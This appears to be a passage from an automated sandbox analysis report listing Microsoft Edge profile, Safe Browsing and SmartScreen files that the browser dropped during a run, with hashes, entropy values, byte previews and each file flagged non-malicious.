JShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF50e8e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726580610927
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+/tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Stbz8hu3VlXr4CRo1
MD5:	041E41530EB800BD60DC720B114C723A
SHA1:	79D96B00B4D90BB3BB078705B95D37FED7ACE751
SHA-256:	FF687872F0B0B1253D3A81420CF0A4973573B87BCBA3E97B04E93410A181690E
SHA-512:	04C9F53FDD3512A44A8B691D1ABAE7D4239131F1CE77D972FFAABF71010E5EB4380E627CF7D271BE0228CBF57EAAF28BE3F8F05335F93166C8B2E09967BFC615
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2035441
Entropy (8bit):	4.001518553934537
Encrypted:	false
SSDEEP:	49152:4PoyBNtMRzlijTPDqhh+KiKK4JyA8QdLRSKw4ogDUZOZnJUpayy3JUIhw/Kb0aHI:2
MD5:	878B308410C8FF7C4B5C1906C3F06937
SHA1:	2E3007126D23A098BE4560E5578FD8CCEE2E37F4
SHA-256:	3C82216A6041256E2C6F63D3548C47DB0C97A0B8F21F2EF76D20429E772C2D08
SHA-512:	DCBB5F1C7D01ED5D13F426B642CC2239FB79DB8A28ECDA9DEFDD42E5B45B5FAE5821ACD70AE3B31A4CF285E057B1EC8DEE8D94EBDFE129B3BC83EED11BD85794
Malicious:	false
Preview:	........\| .*..\|.....\|. ...\|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store_new

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	2035441
Entropy (8bit):	4.001518553934537
Encrypted:	false
SSDEEP:	49152:4PoyBNtMRzlijTPDqhh+KiKK4JyA8QdLRSKw4ogDUZOZnJUpayy3JUIhw/Kb0aHI:2
MD5:	878B308410C8FF7C4B5C1906C3F06937
SHA1:	2E3007126D23A098BE4560E5578FD8CCEE2E37F4
SHA-256:	3C82216A6041256E2C6F63D3548C47DB0C97A0B8F21F2EF76D20429E772C2D08
SHA-512:	DCBB5F1C7D01ED5D13F426B642CC2239FB79DB8A28ECDA9DEFDD42E5B45B5FAE5821ACD70AE3B31A4CF285E057B1EC8DEE8D94EBDFE129B3BC83EED11BD85794
Malicious:	false
Preview:	........\| .*..\|.....\|. ...\|aaaaagfgdnjcdkncmfkfinnjaiapdblgaaaaaogokkamlflcoccdihncmbgcmflnaaaaaoipnhppjgickhnmdbgfbicakiamaaaaapdcjfaomkafnbpoclmfakjianjdaaaaapiecopgelmleoolpjapkgpglkcbaaaabcdhikdcpainmmjceakmkacogdkoaaaabdgnnajpalbdkkdnknbbbmndbilaaaaabfkbnfjnjldicllofdmjchdancccaaaabgphkbebbdbcibgbppdidkelfoigaaaabibhgjnbdelbcijfciclijhdkgohaaaabmldebjdieoplgdecloipkabiibcaaaaboojhahjgdjeknnemneiajjhhddiaaaabpccljmmhilhhndnjkobdedbpkjpaaaacmnkhlfjgehagffhnhdjfankefglaaaacnnimempmlomnnhdkimkfahjplfpaaaadbhonifkcheeddllhmpapnhcpgiaaaaadbkccgigjdmfmdhgikcckicldhjbaaaadbolalgmogecpogmlebfkpigmpdjaaaaehbfjkafkfgppkjageehakfakfbmaaaaehbppmedegafehiimempeifadcinaaaageoepbmnopkkfeadndbijdghellgaaaagfdmgcibcnlmgiipapnfocaocfneaaaagjojmcedjoignaljgmnihajfhhlpaaaaglldojfgdeaijnfefaggkfjekomeaaaaiihjniipljfegaknmbkneamnoajdaaaainjigbjlofcjekbnjnpiegecbnbaaaaaiognmpgbjoffachmpnnppfnokcbeaaaajcpbcbckoiafnblkdhnldokclbhiaaaajfoihhopfmnlhlnlhogjonmllocoaaaajhoimomebpcfopjpgkbbjdnldoihaaaakdafje

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.012373565691865
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclUtVJQTTVY:YWLSGTt1o9LuLgfGBPAzkVj/T8lUnSy
MD5:	954648DE63BA90378450437F69AD8B4C
SHA1:	06B6464978CF10C0EC28980B2F71DC02297976A2
SHA-256:	8809D2F85C0C46179F51A22C2D47FB8DFF8A8489297C8D1C2ACE3125DFA16A84
SHA-512:	3E6B19155D095B4520550531FA3727AEAAF992C7FD01B27C9DC52EF27ED2808D7B00B974C04AEFF59B0568E14204C7201400EA44457FF5FA848E7CFD4A6763FC
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1731627580736566}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a549a0ec-e785-43b0-ba1e-1ca7dd2bea3d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46065
Entropy (8bit):	6.086518328301311
Encrypted:	false
SSDEEP:	768:mMkbJrT8IeQcrQg5o5RwRuNhDO6vP6ONlp1PqvLiPyP2185CAo0Goup1Xl3jVzX+:mMk1rT8HZo5RA6tlOP2185Ro0hu3VlX+
MD5:	5D7670766D09674E94A107B6B4A800BE
SHA1:	29FAC45DC3C94F6200B05FD70D8D59766DFD3C46
SHA-256:	35CE5E2CB9D8836EECD5FF18878BBF54D1A7D4704A7A17CC3D8A2EA64E6A0502
SHA-512:	15EF987A1A7288CF17C9C6CFD982DC455A00D00B91673C8AAAD1814E467ABE4E947ADFE7B6A480A9A8D45147DDAAD5CD0ADB45D161D8CD3748B307BF05231112
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c06a43dc-fd3c-4b85-b5da-dfc58465b119.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45988
Entropy (8bit):	6.086583630296857
Encrypted:	false
SSDEEP:	768:mMkbJrT8IeQcrQgx95RwRuNhDO6vP6ONl11PqvLiPyP2185CAo0Goup1Xl3jVzX+:mMk1rT8HR95RA6tlqP2185Ro0hu3VlX+
MD5:	E2F5FC670A0B527EAFBC7BBCBC112379
SHA1:	6C30A8ACB30222DAB40021F616B717962A881A43
SHA-256:	1BDAF0AC194C56099D94AB8F392AADF43D409D07DAFAA2C449376C49CCE72CB4
SHA-512:	5B67A6548DF1FA1C5BDA98A72E83CE18E235F49581724A7D3FE80FF79EBB22802603C88B0BF9E0D94F73C0A84250E09A37A81B7B069F839B289BEF4C2E99BF98
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d36e703d-fdf8-446f-a3ed-26dc054186b4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46065
Entropy (8bit):	6.086517006149316
Encrypted:	false
SSDEEP:	768:mMkbJrT8IeQcrQg595RwRuNhDO6vP6ONlp1PqvLiPyP2185CAo0Goup1Xl3jVzX+:mMk1rT8HZ95RA6tlOP2185Ro0hu3VlX+
MD5:	05EFF3AAD74A4592694EF449F2A4A44A
SHA1:	765AA4F660B96C4FA68C713D1B75E1E61EECEEC2
SHA-256:	E5DA7689D1148C5D8EE332A2F73B549FF24D5FD01874A5CAE8245E74BF47C30E
SHA-512:	B56E1D549660E935B59D991C7809C7BE49C766374E2CEE517136154716CB28898473CE3B61F7C6394584697A07C84258B536EA5006753DEAB4E9B61576DD9CB8
Malicious:	false
